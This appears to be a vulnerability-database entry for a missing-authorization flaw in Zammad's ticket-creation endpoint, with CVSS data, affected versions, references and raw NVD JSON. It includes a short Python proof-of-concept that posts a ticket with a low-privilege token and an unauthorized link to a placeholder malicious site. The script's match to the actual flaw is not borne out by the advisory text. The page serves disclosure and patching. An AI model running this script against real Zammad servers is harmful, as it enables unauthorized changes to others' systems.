CVE-2026-34722

Description

Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the used endpoint for ticket creation was missing authorization if the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zammad:zammad:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:* - VULNERABLE

Zammad < 7.0.1

Zammad < 6.5.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL (Zammad installation) target_url = "http://target-zammad-instance.com/api/v1/tickets" # Headers with low-privilege authentication token headers = { "Authorization": "Token low_priv_user_token_here", "Content-Type": "application/json" } # Payload exploiting the missing authorization on 'links' parameter payload = { "title": "Exploit Test Ticket", "group": "Users", "customer": "[email protected]", "article": { "subject": "Test Article", "body": "Testing the vulnerability." }, # Vulnerable parameter: Adding a link without proper authorization check "links": { "target": "http://malicious-site.com", "type": "child" } } try: response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 201: print("[+] Exploit successful! Ticket created with unauthorized link.") print("Response:", response.json()) else: print("[-] Request failed or patched.") print("Status Code:", response.status_code) print("Response:", response.text) except Exception as e: print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34722
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34722
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34722/
[4] VulDB https://vuldb.com/cve/CVE-2026-34722
[5] https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34722", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:22.440", "lastModified": "2026-04-17T15:14:07.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the used endpoint for ticket creation was missing authorization if the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zammad:zammad:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.4", "matchCriteriaId": "5AC4AB35-4DD1-43F8-B481-27640E70CF8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "830AF7C5-9441-4C80-935E-C53BDB097BB1"}]}]}], "references": [{"url": "https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}